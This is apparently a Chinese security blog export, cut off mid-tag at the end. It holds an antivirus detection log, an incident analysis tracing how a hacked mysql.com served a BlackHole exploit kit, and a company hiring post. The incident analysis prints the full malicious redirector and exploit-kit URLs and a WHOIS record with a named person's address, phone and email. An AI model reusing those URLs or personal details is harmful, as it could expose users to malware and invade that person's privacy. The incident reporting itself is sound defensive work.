<b>2011-10-01 03:00 UTC</b> 14 / 43, BitDefender, F-Secure, GData, PCTools, SUPERAntiSpyware<br />
<br />
<b>2011-10-01 07:00 UTC</b> 14 / 43,<br />
<br />
<b>2011-10-01 11:00 UTC</b> 17 / 43, Avast, McAfee, VIPRE<br />
<br />
<b>2011-10-01 15:00 UTC</b> 17 / 43, <br />
<br />
<b>2011-10-01 19:00 UTC</b> 22 / 43, Ahn-Lab-V3, Ikarus, K7AntiVirus, McAfee-GW-Edition, Sophos<br />
<br />
<b>2011-10-01 23:00 UTC</b> 22 / 43,<br />
<br />
<b>2011-10-02 03:00 UTC</b> 22 / 43,<br />
<br />
<b>2011-10-02 07:00 UTC</b> 22 / 43,<br />
<br />
<b>2011-10-02 11:00 UTC</b> 22 / 43,<br />
<br />
<b>2011-10-02 15:00 UTC</b> 22 / 43,<br />
<br />
<b>2011-10-02 19:00 UTC</b> 22 / 43,<br />
<br />
<b>2011-10-02 23:00 UTC</b> 22 / 43,<br />
<br />
<b>2011-10-03 03:00 UTC</b> 22 / 43,<br />
<br />
<b>2011-10-03 07:00 UTC</b> 22 / 43,<br />
<br />
<b>2011-10-03 11:00 UTC</b> 30 / 43, AntiVir, Antiy-AVL, CAT-QuickHeal, Emsisoft, TheHacker, TrendMicro, TrendMicro-HouseCall, VirusBuster<br />
<br />
<b>2011-10-03 15:00 UTC</b> 30 / 43,<br />
<br />
<b>2011-10-03 19:00 UTC</b> 31 / 43, nProtect<br />
<br />
<b>2011-10-03 23:00 UTC</b> 31 / 43,<br />
<br />
<b>2011-10-04 03:00 UTC</b> 31 / 43,<br />
<br />
<b>2011-10-04 07:00 UTC</b> 31/ 43,<br />
<br />
<b>2011-10-04 11:00 UTC</b> 31 / 43,<br />
<br />
<b>2011-10-04 15:00 UTC</b> 31 / 43,<br />
<br />
<b>2011-10-04 19:00 UTC</b> 31 / 43,<br />
<br />
<b>2011-10-04 23:00 UTC</b> 31 / 43,<br />
<br />
<b>2011-10-05 03:00 UTC</b> 31 / 43,<br />
<br />
<b>2011-10-05 07:00 UTC</b> 31 / 43,<br />
<br />
<b>2011-10-05 11:00 UTC</b> 32 / 43, eTrust-Vet<br />
<br />
<b>2011-10-05 15:00 UTC</b> 32 / 43,<br />
<br />
<b>2011-10-05 19:00 UTC</b> 32 / 43,<br />
<br />
<b>2011-10-05 23:00 UTC</b> 32 / 43,<br />
<br />
<b>2011-10-06 03:00 UTC</b> 32 / 43,<br />
<br />
<b>2011-10-06 07:00 UTC</b> 32 / 43,<br />
<br />
<b>2011-10-06 11:00 UTC</b> 33 / 43, Fortinet<br />
<br />
<b>2011-10-06 15:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-06 19:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-06 23:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-07 03:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-07 07:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-07 11:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-07 15:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-07 19:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-07 23:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-08 03:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-08 07:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-08 11:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-08 15:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-08 19:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-08 23:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-09 03:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-09 07:00 UTC</b> 33 / 43, <br />
<br />
<b>2011-10-09 11:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-09 15:00 UTC</b> 33 / 43,<br />
<br />
<b>2011-10-09 19:00 UTC</b> 34 / 43, JIangmin<br />
<br />
<b>2011-10-09 23:00 UTC</b> 34 / 43,<br />
<br />
尚未偵測到的: ByteHero, ClamAV, Commtouch, eSafe, F-Prot, Prevx, Rising, VBA32, ViRobotUnknownnoreply@blogger.com3tag:blogger.com,1999:blog-1441759431140700676.post-45143756218297450732011-09-27T12:27:00.000+08:002011-09-27T12:27:59.902+08:00mysql.com遭駭客入侵,導致瀏覽者感染惡意軟體(作者: Wayne Huang, Chris Hsiao, NightCola Lin)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHC5dK9TzFhH7a7fk-lAv62cUHSN1sR75cRFTL2YpTNmvwyfKzPHUoImyVFpzpiu5Wr75aB60zJ52JPoAH_v2gwUMvqle9R8Y9Vz0Bh4iA9DW2Mqjd-3I66K7yREsSsJ3DMXd5QW5e2OU/s1600/mysql+hacked+serving+malware+1.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHC5dK9TzFhH7a7fk-lAv62cUHSN1sR75cRFTL2YpTNmvwyfKzPHUoImyVFpzpiu5Wr75aB60zJ52JPoAH_v2gwUMvqle9R8Y9Vz0Bh4iA9DW2Mqjd-3I66K7yREsSsJ3DMXd5QW5e2OU/s1600/mysql+hacked+serving+malware+1.png" /></a></div>我們的 <a href="https://hackalert.armorize.com/">HackAlert</a> 24x7 網站監控平臺在 9/26 偵測到 mysql.com 被入侵,並且被利用來散佈惡意程式。上圖中反白的部份就是被注入的javascript。以下影片則是當瀏覽者瀏覽 mysql.com時,被感染的實況:<br />
<iframe height="468" width="750" src="http://www.youtube.com/embed/J7prODlHniU?hl=zh&fs=1" frameborder="0" allowfullscreen></iframe><br />
<span class="fullpost"><br />
<b>[感染鏈]</b><br />
<br />
<b>Step 1: http://www.mysql.com</b><br />
<br />
內含一段JavaScript讓瀏覽器去載入以下js:<br />
<br />
<b>Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011 </b><br />
<br />
感染點就在這邊。完整的js 檔可以在<a href="http://snipt.net/armorize/mysqlcom-injection-point/?key=3a3468c8a3fb7d694a138351c94a5606">這裡</a>找到。<br />
<br />
被注入的區段可以從一開始的圖看到。當我們將這段混碼的JavaScript解開之後如下:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuPv-t4am5H4alMzdeJNGh5eckp2f8hxs7FySjXjM6a1gIM65AfvFAjqeymN6rIMjhsdlFGPO-vG69Bo9fV3W1dfaR-QSr9soF0j9LetTN-PMW9XrEzVXc_ZcTjDtk8VV1AEqkqbytJwA/s1600/mysql+hacked+serving+malware+2.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuPv-t4am5H4alMzdeJNGh5eckp2f8hxs7FySjXjM6a1gIM65AfvFAjqeymN6rIMjhsdlFGPO-vG69Bo9fV3W1dfaR-QSr9soF0j9LetTN-PMW9XrEzVXc_ZcTjDtk8VV1AEqkqbytJwA/s1600/mysql+hacked+serving+malware+2.png" /></a></div>純文字版本可以在<a href="http://snipt.net/armorize/mysqlcom-hacked-decoded-script?key=ccdc45dc01468ec2f80fcdfa256910c7">這裡</a>看到。這段 script 會產生一個 iframe 指向下一步 (Step 3)。<br />
<br />
<b>Step 3: http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/</b><br />
<br />
此網址會產生Http 302將瀏覽者重導至下一步 (Step 4)。<br />
<br />
<b>Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php</b><br />
<br />
這個網域上面放著 BlackHole Exploit Pack。它會利用瀏覽者的瀏覽環境( 瀏覽器、瀏覽器插件: Adobe Flash,Adobe PDF,Java,etc... )來進行惡意攻擊。一旦成功之後,不需要瀏覽者的允許,便會永久性的在其機器上面安裝惡意程式。瀏覽者不需要做任何的點選或者同意任何事,僅僅是用一個有漏洞的瀏覽環境瀏覽 mysql.com ,便被惡意程式感染。<br />
<br />
目前,惡意程式在<a href="http://www.virustotal.com/file-scan/report.html?id=d761babcb55d21b467dd698169c921995bf58eac5e9912596693fee52c8690a1-1317040603">VirusTotal 上面的偵測率為 4/44</a>。<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijrrPaZeAUJwQM64-M-V2EPBTiYmD2jkJaVCRuP1LaweKnXhXHdTzuGLUXGco3AtCUbR_C_X_RAC7FdMwUXmBC7cZh8S9KMveS46PVks_GXIbK7yD9aCRLzY09fNKykojrqlPvMdYe1uw/s1600/mysql+hacked+serving+malware+3.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijrrPaZeAUJwQM64-M-V2EPBTiYmD2jkJaVCRuP1LaweKnXhXHdTzuGLUXGco3AtCUbR_C_X_RAC7FdMwUXmBC7cZh8S9KMveS46PVks_GXIbK7yD9aCRLzY09fNKykojrqlPvMdYe1uw/s1600/mysql+hacked+serving+malware+3.png" /></a></div><br />
<b>[攻擊者]</b><br />
<br />
我們目前知道的有限。以下為此事件中攻擊者所利用的惡意網域相關資訊。<br />
<br />
<b>falosfax.in (Step 3)</b><br />
Address: 212.95.63.201<br />
Location: Germany / Berlin<br />
Created On:20-Jun-2011 13:17:05 UTC<br />
Sponsoring Registrar:Transecute Solutions Pvt. Ltd. (R120-AFIN)<br />
Registrant Name:CHRISTOPHER J KLEIN<br />
Registrant Street1:7880 SW 132 STREET<br />
Registrant City:MIAMI<br />
Registrant State/Province:Florida<br />
Registrant Postal Code:33156<br />
Registrant Country:US<br />
Registrant Phone:+1.3053771635<br />
Registrant Email:cjklein54@yahoo.com<br />
Admin ID:TS_14483505<br />
Admin Name:CHRISTOPHER J KLEIN<br />
Admin Organization:N/A<br />
Admin Street1:7880 SW 132 STREET<br />
Admin Street2:<br />
Admin Street3:<br />
Admin City:MIAMI<br />
Admin State/Province:Florida<br />
Admin Postal Code:33156<br />
Admin Country:US<br />
Admin Phone:+1.3053771635<br />
Admin Phone Ext.:<br />
Admin FAX:<br />
Admin FAX Ext.:<br />
Admin Email:cjklein54@yahoo.com<br />
Tech Email:cjklein54@yahoo.com<br />
Name Server:NS1.SKYNS1.NET<br />
Name Server:NS2.SKYNS1.NET<br />
<br />
<b>truruhfhqnviaosdpruejeslsuy.cx.cc (Step 4)</b><br />
Address: 46.16.233.108<br />
Location: Sweden / Stockholm<br />
<br />
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-15754423680689329942011-09-05T12:59:00.009+08:002011-09-06T21:34:22.445+08:00阿碼科技誠徵人才--以及關於我們的工作環境和文化各位好!我上一次貼文是十六個月前了。最近都貼<a href="http://blog.armorize.com">英文版部落格</a>較多。好久不見。<br />
<br />
首先,感謝各位的支持,阿碼正在快速地成長--我們前半年的營收,已經超過去年整年的營收了。但是由於業績成長太快,要做的東西太多,公司急缺工程師,於是我在這邊貼文,希望對我們有興趣的技術人才,可以與我聯絡。同時,由於阿碼正處於快速的轉型期,我希望將公司的理念、文化、以及商業模式,藉此跟各位做說明。<br />
<br />
<b><a href="#intro">[公司簡介]</a></b><br />
<b><a href="#values">[理念文化]</a></b><br />
<b><a href="#openings">[徵求人才]</a></b><br />
<br />
<b><a name="intro">[公司簡介]</a></b><br />
<br />
阿碼主要以提供先進的資安產品為主,經營模式分成自有品牌以及代工兩方面。我們一方面以自己的品牌銷售,一方面則專門為各軟體大廠設計並維運最先進的產品與服務。後者是我們獲得快速成長的關鍵,也是整個業界於雲端技術、概念與商業模式的成熟,為阿碼所帶來的機會。<br />
<br />
由於客戶群龐大,大型的軟體公司總是能夠走在市場需求的尖端。企業必須不斷採用新的科技與新的平台--雲端,社群網路,智慧型手機...但是,先行導入者,必先碰到許多資安問題。這不只侷限於威脅面,也受到流程(process)、法規(compliance)、以及法律面的影響。一個企業要採用新的技術或平台,既有的流程要改,標準如何能夠繼續通過(compliant),以及如何在法律上能夠站得住腳等,都會創造出新的資安需求,使這些客戶,找上門來詢問解決方案。<br />
<br />
如何快速地了解這些需求,從威脅面,到法規面,到法律面,到技術的可行性,進而進入產品的設計--這些不見得適合大型的軟體公司來做。大型軟體公司內部體系複雜,加上必須維運目前既有之所有產品及服務,因此常不能夠與市場需求出現之第一時間,掌握機會,推出新服務,新技術。<br />
<br />
但是這非常適合阿碼來做。我們機動性夠,資安能量足,可以很快地做完所有的分析,產生原型,讓對方灑給客戶測試,並根據回應做逐步修正,最後負責維運。這個模式,首成功於HackAlert之惡意程式掃描(Malware Scanning)。HackAlert掃描的雲端架構由我們設計、開發、維運,開放 API 給客戶呼叫,以 API 次數計價,先是成功於2008年獲得日本最大網路集團:GMO旗下的 GMO Hosting and Security採用,於日本推出 WebAlert 掛馬檢測服務(<a href="http://ir.gmocloud.com/news/press/gmo-hs/100726_1935.html">1</a>, <a href="http://www.securestar.jp/webalert/">2</a>),繼續獲得美國 <a href="http://www.networkworld.com/news/2010/071910-verisign-malware-scanning.html">VeriSign</a> 以及 <a href="http://www.globalsignpassport.com/partners/technology-partners">GlobalSign</a> 兩大 SSL 公司採用,運用在所有的 SSL 客戶網站上。<br />
<br />
VeriSign 該部門被賽門鐵克併購,為我們的合作帶來了威脅。賽門鐵克是以防毒起家的軟體公司,併購後立刻進行評估,是否可以用既有技術取代 HackAlert。可是結果發現,以「透過雲端掃瞄掛馬」的技術來說,內部無法取代阿碼,因此不但沿用,其VP更公開表示,賽門鐵克擁有高水準的雲端掛馬掃瞄,因為<a href="http://www.symantec.com/connect/blogs/network-solutions-malcode-widget-first-discovered-verisign-trust-seal-web-site-malware-scannin">他們引進了阿碼的HackAlert平台</a>。去年年終的年度報告上,內部統計資料顯示,因為多提供了掛馬檢測,加速了他們 SSL 客戶的成長,也幫助保留了既有的客戶。<br />
<br />
由於賽門鐵克是資安公司,取得內部信任與信心後,我們承接了多個新產品與服務的開發。最近一個快完成的,已經經過對方第一階段的既有客戶使用評比。對方選了超過一百家的美國企業,條件是「目前正在使用對手相關服務」。試用結果:一致好評。該產品即將上市,與所有賽門鐵克之客戶見面。這只是其中之一。其他各項新的產品與服務,從今年到明年底,也會陸續與各位見面。<br />
<br />
同時,我們每個月將一些研究成果發表在<a href="http://blog.armorize.com">英文部落格</a>上,常被美國最大的各媒體報導,包含路透社,USA Today,IDC等,最近連<a href="http://www.youtube.com/watch?v=eHu-yjF1qZQ">電視新聞</a>都上了。又加上我們的代工服務,於業界的口碑不錯,經過媒體報導與大家口耳相傳,阿碼在資安界,已經成為各公司在研發新產品與服務時的首選合作伙伴之一。<br />
<br />
這對阿碼本身也非常適合。以賽門鐵克為例子,他們的售後服務有24X7的電話中心,但是我們沒有。他們有龐大的行銷團隊,可以為新的服務做許多的影片,登許多廣告,但是我們沒有。幫他們代工,我們只負責設計,開發,以及維運,然後寫一個客戶服務手冊,派人去美國、日本、澳洲三地將對方之電話中心支援團隊訓練完成,這個服務就有24x7的客戶服務了。我們也參與廣告影片、文宣的設計,但是資源都是對方出。這對於阿碼這樣一個以技術為主的團隊來說,十分合適。<br />
<br />
由於一下子太多廠商找我們合作,題目也廣,我們必須很謹慎地挑選。幾個月前,某美國水果公司多次找我們,但經過評估,我們沒有任何資源能夠承接,我只好內部提議,回絕對方。也是這時,董事長沙正治先生,覺得我們不可以將這些機會拱手送出,公司必須很快募資,並在工程部方面做一定的成長。<br />
<br />
募資非常順利,既有投資人全部支持,董事會也於之前核準了新技術股的發放,讓技術股不致因募資而受太大影響。上星期我們完成了阿碼有史以來最大的一次增資案,故我於此貼文,介紹公司,希望對資安有興趣的技術人才,可以考慮加入我們。<br />
<br />
當然,在品牌方面,我們也有很棒的成績。各位看FOX拍的電影嗎?嗯,我們同事剛從 LA 回來--他們買了軟體版的CodeSecure V4。CodeSecure改成軟體版後,由於試用容易,價錢合理,準確度也好,客戶採用的速度比以前快很多。上星期我們正式發表 CodeSecure V4 軟體版,並與 Digital River合作,客戶可以<a href="http://www.armorize.com/codesecure/">直接透過網站下載並購買 CodeSecure V4</a>。<br />
<br />
對我們品牌產品有興趣的朋友,可以透過<a href="http://www.armorize.com">我們網站</a>了解。在這邊我希望先介紹公司理念與文化,以及我們需要的人才。<br />
<br />
<b><a name="values">[理念文化]</a></b><br />
<br />
經營理念:<br />
<b>不斷在技術與服務模式上創新,提供最先進的資安服務與產品,持續探索各種自動化之可行性,降低資安投資門檻,滿足客戶需求,提升客戶滿意度。</b><br />
<br />
我們是一家軟體公司,但我們更是一家資安公司。我們充分掌握資安威脅,並不斷尋求新的技術,期待能運用於資安之產品與服務上。目前,從源碼檢測,到網站的防禦,到被入侵後的處理,我們認為,都還需要太多資安專家的人工的介入,使得資安成本無法降低,資安專家工作亦辛苦。<br />
<br />
我們認為這是可以大幅改善的--透過新技術的運用,透過服務模式的創新,持續地將人工部分儘量自動化,必可不斷降低成本,減少錯誤,提升準確度與即時性。<br />
<br />
公司文化:<br />
<br />
<b>1. 講求結果,注重實際</b><br />
<br />
阿碼目前有三個辦公室:台灣,美國,印度,整個團隊中,不少來自世界各地的人才。有時朋友會問,那麼不同文化之間的差異怎麼辦?我們不相信不同文化的差異會造成什麼影響,因為在阿碼,我們只認同一種文化,那就是對於<b>客戶的滿意度</b>以及<b>產品的品質</b>的追求。<br />
<br />
我們要的結果是:客戶滿意,產品好,用得爽。你所在的部門,若可以達成這點,那麼你們要怎麼做,都可以有彈性。但是,如果沒有達到,那講再多都沒有用。客戶的滿意,產品的品質,是靠做出來的,不是靠談出來的。<br />
<br />
我舉個例子。CodeSecure V4 快正式上市前,我拿給許多朋友測試。結果,有些人跑不起來,原因大致有兩個:<br />
<br />
1) 記憶體問題,所以要修改 .ini 檔,才可順利執行<br />
2) Port 已經被用掉了,也是需要改 .ini 檔<br />
<br />
我在開會討論時提出,得到的回應是:readme.txt 中都寫得很清楚。我的回應是:你買 iPhone 回來要先看 readme.txt 然後改一改設定然後才能打電話嗎?這是什麼爛設計。<br />
<br />
我不爽的是,有些人平常喜歡談一堆在網路上讀的,關於產品設計的理論,都是很高深的,有些名詞我也沒有聽過,但是我不管這個,我只看設計出來的東西。<br />
<br />
東西好,客戶爽,OK 那你要怎麼做,你可以決定。但是東西不好,那請 cut the crap。我堅信,東西比別人好,都是流汗出來的,不是看了很多美麗方法就有什麼用。現在資訊爆炸,做一件事情,方法很多,理論很多,但是這些都沒關係,反正,我們一切看結果。<br />
<br />
<b>2. 保密至上</b><br />
<br />
阿碼一直是這樣執行,但是沒有講明,造成一些問題。我覺得還是這裡講清楚。我們的客戶都不小,找我們做的東西都是他們最新要做的東西,同時,這些客戶兩兩之間,都是你死我活的競爭對手。跟他們工作,我們深刻體會,什麼叫做「連聽到對方名字都不爽」。因此,公司的保密動作,必須做得很好。<br />
<br />
也就是說,如果你期待公司資訊一切要透明,那你會很失望。公司很多東西都不會透明,你只會參與到你參與的部分。<br />
<br />
我舉個例子,去年我去 Black Hat / DEFCON 給我們的掛馬免殺技術 <a href="http://www.drivesploit.org/">drivesploit </a>的演講。其中談到了非常多方法,可以讓掛馬躲避多數資安技術的偵測。隨行某位同事一直問我:我們自家技術對這些方法都沒解,這樣講出去好嗎?我的回答是:恩恩,走一步算一步。<br />
<br />
而事實上,我們早就不怕我講的這些方法。可是公司裡知道詳情的,只有參與的同事。我們平常不提,並且給每個演算法一個代號:A1、A2、A3這樣子。除非你做到成為該項目之核心成員,你不會知道我們如何做的。<br />
<br />
同樣,譬如你在源碼檢測 CodeSecure 部門,那麼其他部門目前正為哪個客戶做什麼技術,何時要上市,你不容易知道。<br />
<br />
你每參與一個產品,就能夠從工作中學到不少,但僅限於你的工作範圍內。其他許多,我只會講個大方向,細節不會公開提。若你對這個不適應,譬如你會覺得「很受傷」,為何你當初「許多東西都不知道」,很多新聞你都是「從媒體上知道」,那麼阿碼便不適合你。保密是工作上的需要,因此我們徹底執行。如果你就是希望知道越多越好,那有方法:努力為公司付出,獲得我的信任,成為核心成員。你越接近核心,知道的就越多。<br />
<br />
<b>3. 注重紀律,講求效率</b><br />
<br />
我們有指紋門禁系統,這個很多軟體公司不會有。很多人會舉矽谷很多好公司的例子,來說明為何不需門禁系統,為何效率比工作時間重要。我們認為效率很重要,但是紀律也很重要。大家都有上班之外的生活。每天有許多事情要處理,所以大家定時上下班,開會方便,生活規律。我們這行除了創新能力要夠,細心度,耐心,這些也格外重要。我們透過雲端提供服務,客戶要求的是 99.99% 的 uptime,每一分鐘的 down time,都會造成公司嚴重損失。因此,如何有紀律地將許多細節做好,是我們追求的。<br />
<br />
效率方面,之前跨部門的溝通最麻煩,但是經過大幅整頓,目前沒這問題。凡事盡量討論,聽過大家的意見後,最後由我來定奪,我對決定負責, 團隊則100%照做。同時,做一切事情,我們都講求效率--這件事是否可以用什麼方法做得更好,是否可以不用這麼多人,這些是我們隨時探討的。<br />
<br />
原因是,我們的效率,就直接關係到我們的成本,而「降低資安投資門檻」是我們永遠追求的目標。<br />
<br />
<b>4. 肯定血汗式的努力,不相信天才型的團員</b><br />
<br />
前天電話中,我第一次透露給共同創辦人 Walter,HackAlert 目前實際的許多作法。Walter 之前因為身體因素,休息了一年半,所以對於我們最近用的技術,並不了解。他聽完問我,大家業界競爭,都落入同一個框框,在同一個框框中,一直拼。我們的作法完全跳出這個,可是這是如何想到的?<br />
<br />
沒錯,我跟他說的這個創新,完全是 thinking out of the box,所以別人再怎麼做,也很難追上我們。可是我堅決不信,這是我們多麼有創意,多麼有不同的創新思維。我的回答是,因為我們最努力,我們花的苦工最多,就像做聯考題目一樣,我們每天設法把所有「新」的題型找出來,並解完。<br />
<br />
因為我們最用心,因為我們流的血汗最多,所以很自然地,我們會從中發現別人沒有發現的方法。我覺得創新就是這麼回事。當你真的很用心做一件事,當你很肯花苦工,甚至在苦無方法時,用最笨的土法煉鋼法去將一些小細節做到,讓你的產品又比別人好 0.5%....<br />
<br />
別小看這0.5%。很多人就是不願意花時間力氣--才0.5%而已嘛!但是就是這種態度,我們流汗,最後,導致我們想出可以提升100%的方法。如果不是這樣,一直想要一下子就有什麼 out-of-box 的想法,那叫做浮沙築高台,最後就如同之前的例子一樣,講了一堆理論做出來的東西卻很爛。<br />
<br />
<b>5. 速度是一切,加班難免但非常態</b><br />
<br />
商場上,速度就是一切,一旦某種需求產生,客戶就是要解決方案。我們公司假日很少加班,平常亦不會常態性<b>每天</b>加班,但是加班絕對是在所難免。我打個比方。某美國大廠,趕著在某月要將某東西上市。但是因為是很新的東西,其內部決策不斷更改,甚至已經跟供應商下單採購大量伺服器,我們的人也排定時間出差裝機,卻臨時又改成,希望我們維運,並要求 99.99% uptime。<br />
<br />
此時,他們最資深的,管整個雲端的頭,Br先生,正帶著家人在夏威夷度假。在週末,對方告知他,晚上12點前,回到飯店,與我們開會。我們能不奉陪嗎?開會完,我們於兩天內要決定一家全球一流的雲端廠商,要符合多種安規,要在幾天內生出一片 server 給我們,還要找 ISP,從骨幹到雲端機房的每個節點,所有使用的設備,都要能夠 fail over。所以我們照做,加班到爆。<br />
<br />
曾經有同事問,對方是全球前幾大軟體公司,為何做事是這樣?但是我並不覺得有不對或有錯。市場是很現實的,當你餓了要吃水餃,那誰先煮好你跟誰買,難不成要等廚師午睡起來?<br />
<br />
客戶是大爺,市場不等人,對方是大公司,但是他們的客戶也都是大公司,客戶就是立刻要,那還有什麼好討論的?我們就是立刻做。<br />
<br />
以上介紹到此,在介紹職缺前,我將這兩個月的媒體相關報導貼於以下,希望能夠吸引各位人才。我們工作雖然辛苦,但是台灣純軟體公司並不多,能走出去的更少。趨勢科技很好,但是是很大的公司,缺乏 startup 的彈性與機動性,很容易讓你成為一個螺絲釘。阿碼正在起飛,如果你適應這裡的文化,這裡將可以提供你一片天,學習新的技術,開發新的系統,執行新的商業模式!<br />
<br />
所以最後,回到文章的中心:廣徵對資安(不限 Web)有興趣的人才,與我們聯絡,多了解我們,並加入我們!<br />
<br />
<p>Msnbc: <a href="http://www.msnbc.msn.com/id/44327693/ns/business-press_releases/t/armorize-technologies-inc-releases-free-community-edition-its-source-code-analysis-tool-benefit-non-commercial-educational-users/"> Armorize Technologies, Inc. Releases Free Community Edition of Its Source Code Analysis Tool to Benefit Non-Commercial and Educational Users</a>, August 30, 2011</p><p>Reuters: <a href="http://www.reuters.com/article/2011/08/30/idUS168770+30-Aug-2011+MW20110830">Armorize Technologies, Inc. Releases Free Community Edition of Its Source Code Analysis Tool to Benefit Non-Commercial</a><a href="http://www.net-security.org/secworld.php?id=11481"></a>, August 30, 2011</p><p>Softpedia <a href="http://news.softpedia.com/news/Malvertizing-Spotted-on-Google-s-DoubleClick-218988.shtml"> Malvertizing Spotted on Google's DoubleClick</a>, August 26, 2011</p><p>Help Net Security: <a href="http://www.net-security.org/secworld.php?id=11481"> Mass injection attack compromised 20,000+ domains, delivers fake AV</a>, August 18, 2011</p><p>Softpedia: <a href="http://news.softpedia.com/news/New-Mass-Injection-Attack-Infects-over-20K-Websites-217168.shtml"> New Mass Injection Attack Infects over 20K Websites</a>, August 17, 2011</p><p>The Register: <a href="http://www.theregister.co.uk/2011/08/13/oscommerce_infection_threatens_web/">Attack targeting open-source web app keeps growing</a>, August 13, 2011</p><p>USA Today: <a href="http://www.usatoday.com/money/industries/technology/2011-08-11-mass-website-hacking_n.htm">Millions of Web pages are hacker landmines</a>, August 11, 2011</p><p>CIO: <a href="http://www.cio.co.uk/news/3295739/new-malware-infects-more-than-six-million-web-pages/">New malware infects more than six million web pages</a>, August 11, 2011</p><p>dark Reading: <a href="http://www.darkreading.com/vulnerability-management/167901026/security/application-security/231300456/willysy-oscommerce-injection-attack-affects-more-than-8-million-pages.html">'Willysy' osCommerce Injection Attack Affects More Than 8 Million Pages</a>, August 09, 2011</p><p>eWeek: <a href="http://www.eweekeurope.co.uk/news/malware-wave-infects-six-million-e-commerce-pages-36281">Malware Wave Infects Six Million e-Commerce Pages</a>, August 08, 2011</p><p>PC Magazine: <a href="http://securitywatch.pcmag.com/adobe/285986-millions-of-e-commerce-sites-hacked-to-serve-malware">Millions of e-commerce Sites Hacked to Serve Malware</a>, August 08, 2011</p><p>Tech World: <a href="http://news.techworld.com/security/3295722/willysy-malware-infects-millions-of-e-commerce-sites/">Willysy malware infects millions of e-commerce sites</a>, August 08, 2011</p><p>ihotdesk: <a href="http://www.ihotdesk.com/article.asp?ID=800692508&utm_source=twitterfeed&utm_medium=twitter&utm_campaign=Feed%3A+IhotdeskYourTrustedIctPartner+%28ihotdesk+-+IT+and+Outsourcing+News%29">Malware reaches 6m pages in two weeks</a>, August 08, 2011</p><p>GEV: Malware <a href="http://www.gev.com/2011/08/malware-willysy-infects-more-than-6-million-e-commerce-web-pages/">"Willysy" Infects More than 6 Million E-Commerce Web Pages</a>, August 07, 2011</p><p>PC World: <a href="http://www.pcworld.com/article/237457/speedy_malware_infects_more_than_6_million_web_pages.html">Speedy Malware Infects More than 6 Million Web Pages</a>, August 06, 2011</p><p>Spam Fighter: <a href="http://www.spamfighter.com/News-16557-Armorize-Unleash-Massive-Iframe-Injection-Assault.htm">Armorize Unleash Massive Iframe Injection Assault</a>, August 05, 2011</p><p>Kerbs on Security: <a href="http://krebsonsecurity.com/2011/08/is-that-a-virus-in-your-shopping-cart/">Is That a Virus in Your Shopping Cart?</a>, August 05, 2011</p><p>ThreatPost: <a href="https://threatpost.com/en_us/blogs/iframe-campaign-affecting-more-6-million-pages-080111">Massive Injection Campaign Affecting More Than Six Million Pages</a>, August 4, 2011</p><p>Anti-Malware: <a href="http://www.antimalware.com.au/malware-attack-targets-unpatched-oscommerce-websites/">Malware attack targets unpatched osCommerce websites</a>, August 04, 2011</p><p>The H Security: <a href="http://www.h-online.com/security/news/item/Millions-of-osCommerce-stores-hacked-1317410.html">Millions of osCommerce stores hacked</a>, August 03, 2011</p><p>AVG: <a href="http://blogs.avg.com/consumer/massive-iframe-attack-hits-more-than-100000-web-sites/">Massive iframe attack hits more than 100,000 web sites</a>, August 02, 2011</p><p>HK Cert: <a href="https://www.hkcert.org/my_url/en/alert/11080201">Mass Injection Attacks Targeting osCommerce Vulnerabilities</a>, August 02, 2011</p><p>The Register: <a href="http://www.theregister.co.uk/2011/08/02/mass_injection_attack_goes_viral/">Malware attack spreads to 5 million pages (and counting)</a>, August 02, 2011</p><p>Kriterium: <a href="http://www.kriterium.com/news/news.asp?id=169">iFrame Attack Infects More Than 300,000 osCommerce Sites</a>, August 01, 2011</p><p>Softpedia: <a href="http://news.softpedia.com/news/Number-of-osCommerce-Infected-Pages-Raises-to-Millions-in-Under-a-Week-214414.shtml">Number of osCommerce Infected Pages Raises to Millions in Under a Week</a>, August 01, 2011</p><p>SC Magazine: <a href="http://www.scmagazineus.com/mass-injection-campaign-affects-38-million-pages/article/208867/">Mass injection campaign affects 3.8 million pages, </a>August 01, 2011</p><p>The Tech Herald: <a href="http://www.thetechherald.com/article.php/201131/7454/osCommerce-based-mass-injection-now-3-79-million-pages-strong">osCommerce-based mass injection now 3.79 million pages strong</a>, August 01, 2011</p><p>Help Net Security: <a href="http://www.net-security.org/secworld.php?id=11370">Mass iFrame injection attack now counts millions of compromised web pages</a>, August 01, 2011</p><p>Linux Today: <a href="http://www.linuxtoday.com/news_story.php3?ltsn=2011-08-01-001-41-SC-DP">E-commerce sites based on open source code under attack</a>, August 01, 2011</p><p>CRN: <a 